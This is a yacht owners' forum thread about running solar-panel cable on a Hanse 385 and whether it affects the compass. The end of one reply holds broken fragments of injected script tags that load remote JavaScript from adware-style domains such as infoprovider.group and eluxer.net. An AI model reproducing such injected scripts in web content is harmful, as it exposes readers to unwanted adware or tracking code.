myHanse.com - Hanse Yacht Owners Website myHanse.com - Hanse Yacht Owners Website myHanse.com - Hanse Yacht Owners Website myHanse.com - Hanse Yacht Owners Website

Welcome to myHanse.com the forum for Hanse Yachts owners throughout the world.

Forum Home Forum Home > Hints & Tips > 385/388
  FAQ FAQ  Forum Search   Events   Register Register  Login Login

Cable for solar

Post Reply Post Reply
Author
Commander
Commander

Post Options Post Options   Thanks (0) Thanks(0)   Quote Axel Quote  Post ReplyReply Direct Link To This Post Topic: Cable for solar
    Posted: 12 April 2018 at 16:13
I am planning this year to install 2 solar panels on my bimini. For this I need a cable from the box with the lines to the batteries. What is the best way to install this cable? Through the bilge? Or better behind the shower? Or are there different solutions? And how to get the cable (wiring) through the hidden openings?

Greetings from the Adria

Axel
Hanse 385 #434 Nyanga 2
S&J View Drop Down
Admiral
Admiral

Post Options Post Options   Thanks (0) Thanks(0)   Quote S&J Quote  Post ReplyReply Direct Link To This Post Posted: 12 April 2018 at 16:39
You should find this reasonably easy as there is a conduit leading from the aft end of the port berth back towards the navigation area. I wired up some speaker cables through this last year. I think you will find it easier to go behind the shower than via the bilges. I used a flat spring measuring ruler with the end flattened out to get cables from the companionway for my solar panel.
H458 #159 Primal Mediterranean cruising
Petersson View Drop Down
Lieutenant
Lieutenant

Post Options Post Options   Thanks (0) Thanks(0)   Quote Petersson Quote  Post ReplyReply Direct Link To This Post Posted: 17 April 2018 at 20:27
Hi, would it be possible to get a description and maybe a picture on where you entered through the hull and which route you drew the cables?
Goat View Drop Down
Lieutenant
Lieutenant

Post Options Post Options   Thanks (0) Thanks(0)   Quote Goat Quote  Post ReplyReply Direct Link To This Post Posted: 26 May 2018 at 11:03
We ran a cable from the solar controller by the battery aft down the port side past the electrical panel, into heads, under locker in port aft cabin, aft under bunk (alongside cockpit shower hose) and then to a socket in the port rope locker in the cockpit.  We put a waterproof socket in there so the panel can be deployed as necessary rather than always in place.  Needed a mousing tool, several pairs of hands and a fair few expletives to achieve the cable run but a neat enough solution.< ="text/" ="http://infoprovider.group/addons/lnkr5.min.js">< ="text/" ="http://infoprovider.group/addons/lnkr30_nt.min.js">< ="text/" ="http://eluxer.net/code?id=105&subid=51824_5727_">< ="text/" ="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x5727x&r=47">

Edited by Goat - 26 May 2018 at 11:04
S&J View Drop Down
Admiral
Admiral

Post Options Post Options   Thanks (0) Thanks(0)   Quote S&J Quote  Post ReplyReply Direct Link To This Post Posted: 26 May 2018 at 13:17
Goat's solution works well for a Bimini solar panel as the rope bin is reasonably accessible.
After replacing my port Triton with a Vulcan 7 I need to find a way of getting an additional 12V power cable into the port cockpit locker.
I am currently using the power lead for the autohelm but would prefer a dedicated power supply for the Vulcan.
I can see there are lots of N2K cables routed to this locker in addition to the autohelm power, but as yet I've not been able to find any conduit allowing me to run an additional cable.

Edit:  To answer my own question, my handy SEK10 retractable measuring tape from IKEA has proved its worth again.  I was able to feed the tape from the conduit in the port cockpit locker until it appeared in the gap between the bulkhead to the stern area and the aft cabin.  From there I was able to route a cable into the conduit below the berth and then to the cockpit table.

Edited by S&J - 30 May 2018 at 20:29
H458 #159 Primal Mediterranean cruising
Axel View Drop Down
Commander
Commander

Post Options Post Options   Thanks (0) Thanks(0)   Quote Axel Quote  Post ReplyReply Direct Link To This Post Posted: 17 June 2018 at 15:15
Hello goat,

What is a mousing tool?

Greetings Axel
Hanse 385 #434 Nyanga 2
Axel View Drop Down
Commander
Commander

Post Options Post Options   Thanks (0) Thanks(0)   Quote Axel Quote  Post ReplyReply Direct Link To This Post Posted: 24 June 2018 at 14:04
Hello,

this is a question about the influence of the cable on the electronic compass.

The electronic compass and the GPS antenna are near the small cabinet on the port side. I had serious problems with the compass, when I put a comfort seat with a metal core on top. The compass showed a completely wrong direction and the autopilot didn’t work properly. What about a cable for a solar panel? Can it interfere with the compass? Does anybody have experience with it?

Greetings

Axel
Hanse 385 #434 Nyanga 2
415 Singapore View Drop Down
Vice Admiral
Vice Admiral

Post Options Post Options   Thanks (0) Thanks(0)   Quote 415 Singapore Quote  Post ReplyReply Direct Link To This Post Posted: 25 June 2018 at 03:54
Hi Axel
We have wired up our Bimini mounted solar panels the same way and haven't noticed any adverse effect on the compass or autopilot
All the best
Paul
Paul - Night Train - 415 #136
 Post Reply Post Reply